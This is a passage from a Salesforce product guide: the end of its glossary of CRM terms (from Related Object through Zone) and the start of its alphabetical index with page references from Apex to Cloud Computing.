Related Object
Objects chosen by an administrator to display in the Console tab's mini view when records of a particular type are shown
in the console's detail view. For example, when a case is in the detail view, an administrator can choose to display an
associated account, contact, or asset in the mini view.

Relationship
A connection between two objects, used to create related lists in page layouts and detail levels in reports. Matching values
in a specified field in both objects are used to link related data; for example, if one object stores data about companies
and another object stores data about people, a relationship allows you to find out which people work at the company.

Relationship Group
Custom object records used to store collections of accounts.

Relationship Group Member
The accounts that you add to relationship groups are called relationship group members.

Report
A report returns a set of records that meets certain criteria, and displays it in organized rows and columns. Report data
can be filtered, grouped, and displayed graphically as a chart. Reports are stored in folders, which control who has access.
See Tabular Report, Summary Report, and Matrix Report.

Report Builder
Report builder is a visual editor for reports.

Report Type
A report type defines the set of records and fields available to a report based on the relationships between a primary object
and its related objects. Reports display only records that meet the criteria defined in the report type. Salesforce provides
a set of pre-defined standard report types; administrators can create custom report types as well.

Requested Meeting

A meeting that a Salesforce.com user requests with a contact, lead or person account. When a meeting is requested,
Salesforce.com creates a unique Web page for the meeting that displays the proposed meeting times. When invitees visit
the page, they select the times they can meet and send a reply. Salesforce.com tracks all the responses so the organizer
can confirm the best time to meet.
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Once a requested meeting is confirmed, it becomes a multi-person event.

Resource Calendar
A calendar in which multiple people can coordinate their usage of a shared resource such as a conference room or printer.

Revenue Forecasting
Forecasting based on projected revenue amounts.

Revenue Schedule
A revenue schedule outlines the dates, revenue amounts, and number of installments for billing or recognizing revenue
from a product. Your organization can decide exactly how to use schedules. Available in Enterprise, Unlimited, and
Developer Editions only.

Role
Assigned responsibility of a user, partner account, or contact for specific accounts and opportunities. Administrators can
define user roles in Setup. Individual users can assign specific partner and contact roles for accounts and contacts.

Running User
Each dashboard has a running user, whose security settings determine which data to display in a dashboard. If the running
user is a specific user, all dashboard viewers see data based on the security settings of that user—regardless of their own
personal security settings. For dynamic dashboards, you can set the running user to be the logged-in user, so that each
user sees the dashboard according to his or her own access level.

S
S-Control

Note:  S-controls have been superseded by Visualforce pages. After March 2010 organizations that have never
created s-controls, as well as new organizations, won't be allowed to create them. Existing s-controls will remain
unaffected, and can still be edited.

Custom Web content for use in custom links. Custom s-controls can contain any type of content that you can display
in a browser, for example a Java applet, an Active-X control, an Excel file, or a custom HTML Web form.

Sales Price
The price of a product on an opportunity. This can be different than the product’s standard or list price.

Salesforce CRM Call Center
A Salesforce feature that seamlessly integrates Salesforce with third-party computer-telephony integration (CTI) systems.

Salesforce CRM Content
An on-demand, content-management system that allows you to organize, share, search, and manage content within
your organization and across key areas of the Salesforce application. Content can include all file types, from traditional
business documents such as Microsoft PowerPoint presentations to audio files, video files, and Web pages.

Salesforce for Outlook

Salesforce for Outlook, a Microsoft® Outlook® integration application that you install, syncs contacts, events, and tasks
between Outlook and Salesforce. In addition to syncing these items, you can add Outlook emails to multiple Salesforce
contacts, and view Salesforce records related to the contacts and leads in your emails—all directly in Outlook!

Depending on your organization, you may be able to customize what you sync and the sync directions between Outlook
and Salesforce. Your administrator determines the level at which you can customize these settings in Salesforce.
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Salesforce for Outlook Configuration
A Salesforce for Outlook configuration is a set of parameters that determine the data that Salesforce for Outlook users
can sync between Microsoft® Outlook® and Salesforce. You can create multiple configurations to simultaneously suit
the needs of different types of users. For example, an opportunity team might want to sync everything, while a manager
might only want to sync events. Users may be able to edit some of their own settings.

Salesforce Classic
Salesforce Classic is a Salesforce feature that enables users to access their Salesforce data from mobile devices running
the mobile client application. The Salesforce Classic client application exchanges data with Salesforce over wireless
carrier networks, and stores a local copy of the user’s data in its own database on the mobile device. Users can edit local
copies of their Salesforce records when a wireless connection is unavailable, and transmit those changes when a wireless
connection becomes available.

Salesforce Office Toolkit
A plug-in makes it easy for developers to access the SOAP API directly from within Microsoft Office products, simplifying
the creation of new integrations and Office-based solutions.

Schedule
See Quantity Schedule and Revenue Schedule.

Screen Pop
Page that displays for an inbound call to a Salesforce CRM Call Center.

Search
Feature that lets you search for information that matches specified keywords. If you have sidebar search, enter search
terms in the Search section of the sidebar or click Advanced Search... for more search options. If you have global search,
enter search terms in the search box in the header.

Search Layout
The organization of fields included in search results, in lookup dialogs, and in the key lists on tab home pages.

Service
A service is an offering of professional assistance. Services related to Salesforce and the Force.com platform, such as
enhanced customer support or assistance with configuration can be listed on the AppExchange.

Service Cloud Console
The Service Cloud console is designed for users in fast-paced environments who need to find, update, and create records
quickly. It improves upon the Console tab by displaying records and related items as tabs on one screen.

Service Cloud Console Integration Toolkit
An API that uses browsers as clients to display pages as tabs in a Service Cloud console; it provides developers with
programmatic access to the console so that administrators can extend it to meet your business needs.

Service Cloud Portal
The Service Cloud portal is the Customer Portal intended for many thousands to millions of users. After you purchase
Service Cloud portal licenses, you can assign them to Customer Portal-enabled contacts so that large numbers of users
can log in to a Customer Portal without affecting its performance.

Setup
A menu where administrators can customize and define organization settings and Force.com apps. Depending on your
organization’s user interface settings, Setup may be a link in the user interface header or in the drop-down list under
your name.
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Share Group
A set of Salesforce users who can access records owned by high volume portal users. Each Customer Portal has its own
share group.

Shared Activities
A feature that allows users to relate as many as 10 contacts to a single non-recurring and non-group task, or to a single
non-recurring event. One contact is the primary contact; all others are secondary contacts.

Sharing
Allowing other users to view or edit information you own. There are different ways to share data:
• Sharing Model—defines the default organization-wide access levels that users have to each other’s information and

whether to use the hierarchies when determining access to data.
• Role Hierarchy—defines different levels of users such that users at higher levels can view and edit information owned

by or shared with users beneath them in the role hierarchy, regardless of the organization-wide sharing model settings.
• Sharing Rules—allow an administrator to specify that all information created by users within a given group or role

is automatically shared to the members of another group or role.
• Manual Sharing—allows individual users to share records with other users or groups.
• Apex-Managed Sharing—enables developers to programmatically manipulate sharing to support their application’s

behavior. See Apex-Managed Sharing.

Sharing Model
Behavior defined by your administrator that determines default access by users to different types of records.

Sharing Rule
Type of default sharing created by administrators. Allows users in a specified group or role to have access to all information
created by users within a given group or role.

Sidebar
Column appearing on the left side of each page that provides links to recent items and other resources.

Sites
Force.com Sites enables you to create public websites and applications that are directly integrated with your Salesforce
organization—without requiring users to log in with a username and password.

Social Accounts and Contacts
A feature that allows you to view your accounts’, contacts', and leads’ social network profiles and other social information
directly in Salesforce, so you can get deeper insights into your existing and potential customers' needs and issues.

Social Key
Social Key works with Social Accounts and Contacts and Data.com Clean to make it easier to follow your contacts and
leads on social networks. From Social Accounts and Contacts, select the social networks you want. Automated Clean
jobs provide the links. From a contact or lead's detail page, you can quickly view their profile on a social network site.

SoftPhone
The telephone interface that a Salesforce CRM Call Center user sees in either the sidebar of Salesforce pages or the
footer of the Service Cloud console.

SoftPhone Connector
A component of a Computer Telephony Integration (CTI) adapter that converts SoftPhone XML into HTML and
distributes it to a Salesforce CRM Call Center user's browser.
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SoftPhone CTI Adapter
A computer-telephony integration (CTI) adapter is a light-weight software program that controls the appearance and
behavior of a Salesforce SoftPhone. The adapter acts as an intermediary between a third-party CTI system, Salesforce,
and a Salesforce CRM Call Center user. It must be installed on any machine that needs access to Salesforce CRM Call
Center functionality.

Software as a Service (SaaS)
A delivery model where a software application is hosted as a service and provided to customers via the Internet. The
SaaS vendor takes responsibility for the daily maintenance, operation, and support of the application and each customer's
data. The service alleviates the need for customers to install, configure, and maintain applications with their own hardware,
software, and related IT resources. Services can be delivered using the SaaS model to any market segment.

Solution Manager
One or more individuals in your organization who can review, edit, publish, and delete solutions. Typically, these
individuals are product experts with excellent written communication skills and advanced knowledge in a particular area
of your product. When creating or editing users, assign the Solution Manager profile to give users this privilege.

Source Report
A custom report scheduled to run and load data as records into a target object for an analytic snapshot.

Stage Duration
In opportunity reports, the number of days the opportunity was in the stage listed in the Stage column.

Stage History
Related list on an opportunity detail page that lists changes in status and stage for the opportunity.

Standard Price
Price for a product that is included in the Standard Price Book.

Standard Price Book
Automatically generated price book containing all your products and their standard prices.

Status
An idea's status helps zone members track the progress of the idea. For example, “Under Review”, “Reviewed”, “Coming
Soon”, and “Now Available” are common status values an administrator can define and assign to ideas. An idea's status
appears next to the idea's title for all zone members to see.

Stemming
The process of reducing a word to its root form. In searches, stemming matches expanded forms of a search term. For
example, when a search uses stemming, a search for run matches items that contain run, running, and ran.

Sub Flow
A subflow element references another flow, which it calls at runtime. The flow that contains the subflow element is
referred to as the master flow.

Summary Field
A summary field is a numerical report column with one of the following summaries applied: sum, average, largest value,
smallest value. Users can define custom summary formulas to extend these options. In addition to showing summarized
information, summary fields can be used to define charts and analytic snapshots.
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Summary Report
Summary reports are similar to tabular reports, but also allow users to group rows of data, view subtotals, and create
charts. They can be used as the source report for dashboard components. Use this type for a report to show subtotals
based on the value of a particular field or when you want to create a hierarchical list, such as all opportunities for your
team, subtotaled by Stage and Owner.

Sync Profile
Personal settings that define what records are included when you synchronize with Connect for Outlook or Connect for
Lotus Notes.

Syndication Feeds
Give users the ability to subscribe to changes within Force.com sites and receive updates in external news readers.

T
Tag

In Salesforce, a word or short phrases that users can associate with most records to describe and organize their data in
a personalized way. Administrators can enable tags for accounts, activities, assets, campaigns, cases, contacts, contracts,
dashboards, documents, events, leads, notes, opportunities, reports, solutions, tasks, and any custom objects (except
relationship group members) Tags can also be accessed through the SOAP API.

In Salesforce CRM Content, a descriptive label that helps classify and organize content across libraries. Users can view
a list of all files or Web links that belong to a particular tag or filter search results based on a tag or tags.

Tag Cloud
In Salesforce CRM Content, a way of showing you how the content in your libraries has been tagged. Tag names increase
in size within the tag cloud according to popularity, meaning that the largest tags have been assigned to the most files
or Web links. You can choose to sort the tags alphabetically or by popularity. The tag cloud contains the 30 most popular
tags.

Task
Assigns a task to a user you specify. You can specify the Subject, Status, Priority, and Due Date of the task.
Tasks are workflow and approval actions that are triggered by workflow rules or approval processes.

For Calender-related tasks, see Activity (Calendar Events/Tasks).

Task Bar Links
Links on tabbed pages that provide quick access to the most common operations available for a particular page, for
example, creating a new account.

Territory
For forecasting versions where territories are used, this is a collection of accounts and users that generates a forecast.

Time-Dependent Workflow Action
A workflow action that executes when the conditions of a workflow rule and an associated time trigger are met.

Top All Time Ideas
On the Top All-Time subtab, ideas are sorted from most number of points to fewest. This allows you to see the most
popular ideas in the history of your Ideas zone.
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Topics
When you post or comment in Chatter, you can associate your post or comment with all other posts and comments on
the same subject by adding a topic. A topic is a way to categorize your post or comment so other people can find it more
easily. Topics also help you discover people and groups that are knowledgeable and interested in the same topics.

Topics, Chatter Answers
The sidebar that lists data categories from which your customers can browse questions and replies. For example, if you
have a zone for hardware products, your topics may include laptops, desktops, and printers.

Translation Workbench
The Translation Workbench lets you specify languages you want to translate, assign translators to languages, create
translations for customizations you’ve made to your Salesforce organization, and override labels and translations from
managed packages. Everything from custom picklist values to custom fields can be translated so your global users can
use all of Salesforce in their language.

Trending Topics
The Trending Topics area on the Chatter tab shows the topics being discussed right now in Chatter. The more frequently
people add a specific topic to their posts and comments and comment on or like posts with the same topic over a short
period of time, the more likely it is to become a trending topic. For example, if your coworkers are attending the upcoming
Dreamforce conference and have started discussing it in Chatter, you may see a trending topic for Dreamforce. A trending
topic is not solely based on popularity and usually relates to a one-time or infrequent event that has a spike in activity,
such as a conference or a project deadline. For privacy reasons, Trending Topics don’t include topics used solely in private
groups or record feeds.

Truncate
Truncating a custom object allows you to remove all of the object’s records, while keeping the object and its metadata.

U
Unlimited Edition

Unlimited Edition is salesforce.com's flagship solution for maximizing CRM success and extending that success across
the entire enterprise through the Force.com platform.

Usage-based Entitlement
A usage-based entitlement is a resource that your organization can use on a per-month basis, such as the allowed number
of logins to a Partner Community.

V
Visualforce

A simple, tag-based markup language that allows developers to easily define custom pages and components for apps
built on the platform. Each tag corresponds to a coarse or fine-grained component, such as a section of a page, a related
list, or a field. The components can either be controlled by the same logic that is used in standard Salesforce pages, or
developers can associate their own logic with a controller written in Apex.

Vote, Idea
In an ideas community, a vote means you have either promoted or demoted an idea. After you vote on an idea, your
nickname displays at the bottom of the idea's detail page to track that your vote was made. You can use your Recent
Activity page to see a list of all the ideas you have voted on.

Vote, Reply
In an answers community, a vote means you either like or dislike a reply to a question.
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W
Web Direct Leads

Web direct leads is a specific lead source indicating that the lead was generated when a user, who has bookmarked your
website or directly typed the URL of your website into a browser, filled out the Web-to-Lead form containing the
Salesforce tracking code.

Web Links
See Custom Links.

Web Referral Leads
Web referral lead is a specific lead source indicating that the lead was generated when a user navigated to your website
using a referring link on another site and filled out the Web-to-Lead form containing the Salesforce tracking code. For
example, if a user is browsing your partner's website and clicks on a link to your website, then fills out your Web-to-Lead
form, a Web referral lead is generated. The lead source details include the referring URL for each Web referral lead.

Web-to-Case
Functionality that lets you gather customer support issues and feedback on your company’s website and then generate
cases using that data.

Web-to-Lead
Functionality that lets you gather registration or profile information on your company’s website and then generate leads
using that data.

Workflow Action
A workflow action is an email alert, field update, outbound message, or task that fires when the conditions of a workflow
rule are met.

Workflow Rule
A workflow rule sets workflow actions into motion when its designated conditions are met. You can configure workflow
actions to execute immediately when a record meets the conditions in your workflow rule, or set time triggers that execute
the workflow actions on a specific day.

X
No Glossary items for this entry.

Y
No Glossary items for this entry.

Z
Zone

Zones organize ideas and questions into logical groups, with each zone having its own focus and unique ideas and
questions.
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setting class security 3612
sharing reasons 3616
source code 3546
testing 3584, 3752
tests 3754, 3756–3759
tools 3792
trigger detail page 3585
version settings 3583
viewing a class 3584
viewing debug logs 672

Apex Data Loader
See Data Loader 485

Apex Plug-in element 3250
Apex REST API 436
Apex SOAP API 436

API
access from packages 3841
default package versions 3840
downloading a WSDL 3657
downloading enterprise WSDL 3845
editing access from AppExchange packages 3843
increasing limits 3941
recurring events modifications 1627
recurring tasks modifications 1627
usage limits 3941
usage metering 3941

API usage
details 3668
notifications 3667–3668

app 3
App permissions 365
App quick start

creating apps 3522
next steps 3524

AppExchange
adding components 3810
Apex errors 3579
assigning publishers 3862
branding 3868–3869
creating packages 3808, 3839, 3854–3855, 3857–3860, 3863
creating patches 3880
custom help 3861
Data.com impact dashboard 1440
Data.com Reports 1440
deleting components 3838
designing apps 3821
developer settings 3806
developing app documentation 3861
downloads 729
editing package API access 3843
email branding 3871–3873
Force.com app menu 3521
login branding 3868–3869
Login branding 3870
managed package release types 3807
managed package versions 3807
managed packages 3803
managing packages 3806
managing uploads 3879
package API access 3841
package details 3832
packages 730
Publishing guide 165
Sample CRM Dashboards 2587
uploading packages 3863
uploading patches 3880
who can use 740
who can use packages 741

Application
installation guide 165

Approval post templates
creating 3200
editing 3200
managing 3199
viewing 3201

Approval processes
approval post templates for Chatter 3199–3201
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Approval processes (continued)
approval requests for Chatter 3195, 3197
change set restrictions 3778
changing approval user preferences 3208
checklist 3161
cloning 3184
considerations 3206
creating 3169
creating actions 3178
creating steps 3173
debug logs 3739
deleting 3184
deleting steps 3177
discounting opportunities sample process 3212
Draft emails

2152
approval processes 2152

editing 3184
editing steps 3177
email approval response 3145
email approvals response FAQ 164, 3531
example 3209–3210, 3212–3213
examples 3209
examples guide 164, 3531
expense reports sample process 3210
field updates 3123, 3127, 3142
final approval actions 3181
final rejection actions 3182
getting started 3160
initial submission actions 3180
job candidates sample process 3213
jump start 3164
launching Process Visualizer 3187
outbound messages 3129
overview 3159
Process Visualizer notation 3192
Process Visualizer user interface 3188
PTO request sample process 3209
recall actions 3183
selecting actions 3179
terminology 3217
tip sheet for administrators 164, 3531
tracking outbound messages 3133
useful processes 3209–3210, 3212–3213
viewing details 3186
viewing outbound message queue 3133
visualizer 3186
with draft emails 2152

Approval requests
approval history 3204
approving 3201
items to approve 3203
mass transfers 3205
reassigning 3201
rejecting 3201
via Chatter 3201
via email 3201

Approvals
creating an approval queue 2274
limits 3907
overview 3113

Approvals in Chatter
considerations 3197
disabling 3197
enabling 3197
getting started 3196
tips and tricks 3197
visibility 3195

apps
opening 43

Apps
assigning licenses for 736
assigning to profiles 3526
creating 3525
customizing tabs 3526
design 3821
development process 3836
Managed packages

3821
component behavior 3821

managing 3522
managing licenses for 734
overview 3521
Packages

3821
component behavior 3821

properties 3526
removing 3526
revoking licenses for 737
Unmanaged packages

3821
component behavior 3821

uploading 3863
visibility, setting in permission sets 357
visibility, setting in profiles 348

Archiving
article versions 1868
articles 1868, 2239
content 2442
field history 669

Article
fields searched 94

Article Translations
exporting 2274
importing 2234
queue 2274

Article types
adding sections to layout 2217
assigning templates to channels 2218
creating 2214
creating custom templates 2219
creating fields 2222
custom templates 2225
deleting 2216
field-level security 1886
Fields related list 2223
managing 2221
rearranging fields on layout 2217

articles
general information 1882
viewing 1882
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Articles (continued)
archived versions 1868
archiving 2239
assigning 1872
categorizing 2241
creating 1869
creating an article from a reply 1770
CSV file for importing to Salesforce Knowledge 2280
deleting 1875
enable PDF attachments on case email 1700, 2227
export status 2287
exporting 552
field visibility in PDF files 1700, 2227
history 1885
import status 2287
importing 2278
importing parameters for Salesforce Knowledge 2284
managing 1877
modifying 1869
monitoring 2177
overview of the publishing cycle 1877
preparing articles for import to Salesforce Knowledge 2279
publishing 1874
searching 1858
See also Article types 2212, 2271–2272
See also Salesforce Knowledge 2212, 2271–2272
send as PDFs from cases 1700, 2227
suggestions on cases 1695
tracking changes 1885
translating 1884
validation status 2273
versions 1868
viewing 1866
zip file for importing 2286

Asset
fields searched 95

Assets
cloning 799
creating 798
deleting 801
displaying 797
editing 797
fields 800
getting started 796
overview 796
renaming 2804
reports 2652
searching 802
tip sheet for administrators 163
viewing 797

Assigning
cases 1681
leads 986
Salesforce for Outlook configurations 1624

Assignment element
adding 3242
configuring 3242

Assignment rules
debug logs 3739

Associating
price books 1089
products 1089

ATOM mappings for feeds 3438
Attachment

fields searched 96
Attachments

adding 70
deleting 78
email templates 1287
fields 70
HTML security 585
Salesforce CRM Content 2445
Salesforce to Salesforce 1225
sending email 1265
size limit on emails 1268
viewing and editing 51

Auditing
fields 666–668

authentication providers 623
Authentication providers

community 629
Facebook 624, 629–633
Janrain 626, 629–633
Salesforce 628–633
scope 629
sites 629
startURL 629

Auto-response rules
debug logs 3739
differences from workflow alerts 2169
setup 2167

B

Background jobs
about 673
sharing recalculation 673
viewing 673

Backing up data
exporting your data 552

Bar chart
dashboard component 2779

Base theme
tip sheet for administrators 164

Batch jobs 3589
Best Answer 1768
Best Practices

patch versions 3887
push upgrades 3887
Salesforce Knowledge 2291

Big deal alerts
customizing 1515

Billing information 266–267
Billing Information 267
Bind variable testing 3445
Bind variables for feeds 3438
BlackBerry

Chatter 2320
bookmarks

removing 2338
Bookmarks

adding in Chatter 2338
Bounced email

management 1600 3979
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Briefcase
assigning users and profiles to configurations 1383
changing your account selection 1389
creating configurations 1383
default contents 1388
emptying 1390
manually adding and removing accounts 1387
synchronizing 1390

Briefcase configurations
activating 1382
deactivating 1382
defining data sets 1384
managing 1382
sample data sets 1647

Browsers
Firefox settings 23
Google Chrome Frame installation 25
Internet Explorer settings 22
limited support 20
Open CTI 2062
recommendations 20
requirements 20
settings 20
supported versions 20
tip sheet 161

Bulk API
uploading attachments 499

Bulk data load jobs
monitoring 3661
viewing job details 3663

Business account
fields searched 96

Business Accounts
field limits 3907

Business hours
about 2159
holidays 2161
multiple 2159

Business processes
tip sheet for administrators 164, 3530

Buttons
considerations, custom buttons 3500
considerations, overriding 3503
custom 3493
detail page 2833
Live Agent 2096
overriding 3501, 3504

C

Calendar
day view 1045
enabling click-and-create event creation 256
enabling drag-and-drop editing 256
enabling Home tab hover links 256
Home tab 49
icons 1043
month view 1047
multi-user view 1049
printing 1049
public and resource 1530
settings 1528

Calendar (continued)
sharing 19
sidebar shortcut 1528
tip sheet for administrators 163
viewing 1043
viewing multiple 1049
viewing other 1048
viewing tips 1044
week view 1046

Calendar event
fields searched 114

Call Center
about 2064
adding a user to a call center 2086
answering a call 1715
call center definition files 2067
call center directories 2078
call center fields 2077
changing user state 1724
checking an adapter version 1729
checking an adaptor version 1729
click-to-dial 1728
cloning a call center 2075
creating call centers 2074
creating call logs 1717
CTI adapters 2066
CTI adaptors 2066
CTI toolkit 2062
editing call centers 2076
editing personal settings 1714
enabling HTTPS in a call center 2084
importing call centers 2069
logging in 1723
making a call 1726
making a conference call 1720
managing call center users 2085
managing call centers 2077
Open CTI 2061
putting a caller on hold 1718
removing a user from a call center 2087
setting up 2065
SoftPhone layouts 2080
system requirements 1709
transferring a call 1719
using 1722
using a call center directory 1725
wrapping up a call 1721

Callouts
Unable to parse callout response error 3591

Campaign
fields searched 97
limits 3910

Campaign hierarchy
setting up 932
viewing campaigns 927
viewing statistics 928

Campaign Hierarchy
limits 3911

Campaign member
adding 942
Campaign Update wizard 955
cloning 950
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Campaign member (continued)
displaying 947
editing 939, 950
fields 948
importing 952
Lead Import wizard 953
related list 940

Campaign members 441
Campaign Members

importing, permissions 529
updating, permissions 529

Campaigns
adding members 942
adding members from list views 946
adding members from reports 944
advanced setup 931
calculate ROI 970
campaign history 950
campaign influence 934, 971
campaign influence setup 935
Campaign member fields 948
Campaign Members related list 940
Campaign Update wizard 955
changing ownership 785
cloning 950, 957
creating 956
creating hierarchies 929
deleting 965
displaying and editing 929
displaying campaign members 947
editing 950
editing members 939
fields 958
filtering list views by 57
hierarchy statistics 928
home page 924
implementation guide 164
import file 547
import wizards 546
importing campaign members 952
importing members 547
influence limits 3910
Lead Import wizard 953
managing members 937
managing work flow 925
mass adding members 966
mass removing members 968
overview 923
primary campaign source 971
renaming 2804
reports 2628
ROI reports 971
searching 965
setting member status 931
setting up hierarchies 932
sharing 964
tip sheet 163
viewing campaign influence 936
viewing from Campaigns tab 927
viewing hierarchy 927

Canceling
requested meetings 1076

Canvas App Previewer
overview 3655

Capturing
web cases 1923
web leads 1537

Case
fields searched 98

Case assignment rules 2166
Case Comments

Salesforce to Salesforce 1225
Case escalation rule

queue 2178
Case Feed

accessing 1687
adding custom actions 2146
agent console 1895
assigning users 2142
attaching articles 1697
case detail page 1691
closing cases 1698
configuring the publisher 2150
creating permission sets 2142
custom actions 2146
customer notifications for portal replies 2144
customizing 2148, 2154
customizing with Visualforce 2146
default email templates 2151
email 1708
emailing articles 1705
enabling 2141
enabling email drafts 2145
enabling in custom profiles 2143
feed filters 1687
feed layouts 2148
highlights panel 2148
internal notes 1671
logging calls 1716
overview 1684
page layouts

2147–2148
editing page layouts

2147
assigning page layouts 2147

Portal publisher 2144
pre-loaded email templates 2151
printable view 1690
printing 1690
related lists 1688
renaming actions 2154
renaming feed filters 2154
replying to email 1703
rich text editor 1708
searching for articles 1696
sending email 1704
setting up 2140, 2146, 2150
tip sheet 162
tip sheet for administrators 164
upgrading cases 2143
using articles 1696
using Quick Text in 1709
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Case Feed (continued)
using templates 1706
writing email 1706

Case history 1672
Case Interaction

creating portal posts 1756
Case teams

adding members 1798
adding predefined teams 1798
default case team 2308
email notifications 2311
fields 1801
overview 2306
predefine 2308
roles 2307
setting up 2305
setting up email alerts 2311
update members 1799

Cases
accepting ownership 1662
assigning 1681
capturing web cases 1923
case escalation rules 2173
case history 1672
case teams overview 2306
changing multiple owners 1662
changing ownership 785
changing status 1662
cloning 1680
closing 1697, 1699
closing multiple cases 1662
comments 1668
configuring for Chatter Answers 2049
creating 1663
creating case comments 1669–1670
creating from emails in Salesforce for Outlook 1625
creating in Connect for Outlook 1362
creating with Salesforce for Outlook 1338
deleting 1681
displaying and editing 1665
displaying and editing comments 1669
email-to-case 1701
Email-to-Case attachment limits 1922
escalating 1690
fields 1672
finding related content 2445
finding solutions 1837
hierarchies 1692
home page 1659
implementation guide 163
limiting spam 1922
limits 1925
mass update 1662
merge fields 1293
Milestones 1678
on-demand email-to-case 1701
overview 1658
related cases 1693
renaming 2804
reports 2653
Salesforce for Outlook, setting up to create cases 1627

Cases (continued)
Salesforce to Salesforce 1225
searching 1680
setting assignment rules 2166
setting entitlements-related lookup filters 2195
setting escalation rules 2173
setting up case teams 2305
sharing 1683
solving 1694
taking ownership from a queue 1661
tip sheet 162
tip sheet for administrators 163
upgrading to Case Feed interface 2143
viewing from Cases tab 1661
Web-generated cases 1927
Web-to-Case spam 1927
working with email 1701

Categories
See Data categories 2241, 2254
See Solutions 2241

Category
browsing questions 1764

Category groups
See Data categories 2241

Certificates
CA-signed 636
creating 634
editing 638
uploading 636
viewing 639

Change sets
approval process restrictions 3778
best practices 3779
cloning 3789
deleting 3789
dependent components 3787
deploying 3782
deployment 3780
deployment connections 3783–3785
details 3781
implementation tips 3778
inbound 3781
outbound 3786, 3788–3789
permission sets and profiles 3775
permissions 3774
selecting components 3787
testing before deployment 3781
version errors 3789

Channels
See Salesforce Knowledge 1855

Charts
chart formatting tab 2714
combination 2710
combination chart examples 2712
combining small groups 2714
customizing properties 2706
hover details 2714
See Reports 2573, 2592
types 2766–2775, 2777

Chat
available 2394
away 2394
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Chat (continued)
disabling for Visualforce pages 3611
emoticons 2396
enabling for Visualforce pages 3611
history 2395
offline 2394
options 2397
pop-out 2396
starting a chat 2395
status 2394
using 2392
using the chat list 2393

Chatlets 1734
Chatter

activation link 2496
activity 2371
adding customers 2470
adding hashtag topics 2362
adding topics 2361
administering messages 2490
administering private messages 2490
approval request posts 3202
approvals limits 3931
assigning moderator 2374
attaching files 2351
attaching links 2356
auto-following 2327
automatically following records 2375
bookmarks 2337
chat history 2395
chat status 2394
Chatter Desktop 2321, 2491
chatting 2392
configuring digests 2331
configuring email notifications 2331
configuring mobile 2495
contact information 138
content search limits 3933
creating a task in a feed 1063
customers 2469
customizing Chatter influence 2488
customizing feed tracking 2487
delete messages 2490
deleting files 2355
deleting posts 2344
direct messages 2398
downloading files 2353–2354
edit task 1061
email replies 2329
enabling 2480
enabling mobile 2495
favorites 2342
feed 1061, 2489–2490
feed attachments 2349
feed search 2339
feed tracking 2485
feeds overview 2333
file limits 3931
file recommendations 2339, 2418
Followers list 2369
following files 2353

Chatter (continued)
Following list 2369
following people 140
following records 140
group recommendations 2339, 2390
groups page 2381
influence 2371
inviting people to join 2372
liking posts and comments 2329
limits 3932
link previews 2356
manage messages 2490
mentioning people in posts and comments 2349
mentions 2348
messages 2398
mobile 2320
mobile app IP restrictions 2496
moderator 2373
moderators 2498
overview 2318
owned files 2370
People page 2367
people recommendations 2339, 2370
photos 139
polls 2357–2359
pop out chat 2396
post comments 2329
posting to feeds 2343
posts 2343, 2364–2366
private messages 2398
recommendations 2339, 2370
record recommendations 2339, 2376
records 2375
removing customers 2470
removing topics 2362
revoking mobile app access 2497
search 2339
searching 141, 2339
searching feeds 2340
searching files 2352
setting up 2479
sharing files 2353
single updates 2367
starting a chat 2395
tab 2319
task 1061, 2489–2490
topics groups are talking about 2364
topics people are talking about 2363
trending topics 2364
updates 2343
uploading new versions of files 2353
using chatter feeds 1063
using Chatter Messenger 2392
using the chat list 2393
verification code 2496
view task 1061
viewing files 2353–2354
viewing mobile app device information 2497

Chatter activity 2371
Chatter Answers
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Chatter Answers (continued)
adding to a Customer Portal 2052–2053
adding to a partner portal 2052
adding to a Partner Portal 2054
adding to portal tabs 2052
assigning data categories 2050
best practices 2060
configuring a Customer Portal 2045
configuring a Force.com site 2047
configuring cases 2049
configuring data categories 2051
configuring promote-to-article 2051
configuring Salesforce Knowledge 2051
configuring self-registration 2046
configuring users 2046
creating zones 2021
customizing appearance 2038
editing zones 2021
email notification settings 2044
enabling 2040
enabling without a Force.com site 2052
escalating a question to a case 1771
implementation guide 163
implementation tips 2058
language 2056
limitations 1791
limits 3914
managing users 2056
Questions tab 2050
searching 1797
setting Questions tab visibility 2050
setting up 2039
setup overview 2038
site snapshot 2056
terminology 1793
troubleshooting setup 2056
users 2056
using 1795
Visualforce pages 2040, 2042

Chatter Desktop
configuring 2323
configuring managed version 2493
connecting 2323
controlling access 2491
deploying configuration file 2493
disabling remotely 2325
installing 2322
installing managed version 2492
overview 2321
release information 2325
troubleshooting 2324
using 2401

Chatter favorites 2342
Chatter feed

fields searched 99
Chatter feed searches

adding as Chatter favorite 2341
Chatter Feeds

dashboard component snapshot 2379
list views 2377

Chatter file recommendations 2418

Chatter files
change permission 2413
deleting 2421
editing file details 2420
file detail page 2418
file size limits 2410
filtering 2406
following 2417
make private 2414
searching 2406
shared with 2420
sharing settings and permissions 2412
sharing, privately shared 2416
sharing, via link 2471
sharing, with groups 2415
supported browsers for uploading multiple files 2411
tab overview 2404
uploading a new version 2410
uploading multiple files 2409
uploading overview 2408
using the Files tab 2405
version history 2418

Chatter group
fields searched 99

Chatter group recommendations 2390
Chatter groups

accepting requests 2391
adding members 2384
changing owner 2383
changing roles 2385
creating 2382
declining requests 2391
deleting 2386
editing 2383
group files 2390
joining 141
members 2389
overview 2380
photos 139
removing members 2384
roles overview 2384
viewing group details 2387
viewing membership 2389

Chatter influence
customizing 2488

Chatter messages
administering 2490
deleting 2490
managing 2490

Chatter Mobile
tip sheet 162, 2476

Chatter Mobile App
limits 3934

Chatter Moderator
deactivating free users 2374

Chatter Moderators
assigning moderator privileges 2374

Chatter Plus
limits 3931

Chatter posts
visibility 2344
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Chatter Settings
approval posts 3197
coworker invitations 2482
customer invitations 2484
email notifications 2488
link previews 2519

Chatter Tasks 1061, 1063, 2489–2490
Chatter topic

fields searched 100
Chatter topics

deleting 2483
privacy 2483
topic detail page 2360

Chatter updates 2367
checkbox input fields 3238
Checkout

adding licenses 265
converting a trial 179
granting access to users 268
removing licenses 266

Choice 3263
Classes

debug logs 3750
Clean 897, 905
Clean status

Different 905
In Sync 905
Inactive 905
Not Compared 905
Not Found 905
Reviewed 905

Cleaning data
implementation guide 165, 743
tip sheet for users 162

Click-to-dial 1728
Client authentication certificates

downloading 3657
Clients

See also Desktop Clients 833
wealth management clients 833

Cloning
assets 799
campaigns 957
cases 1680
contacts 810
contracts 1162
dashboards 2578
email templates 1290
leads 997
opportunities 1120
opportunity teams 1132
price books 1096
products 1096

Cloning a change set 3789
Closing

cases 1697, 1699
multiple cases 1662
tasks 1066

Cloud 3
Cloud Computing 3
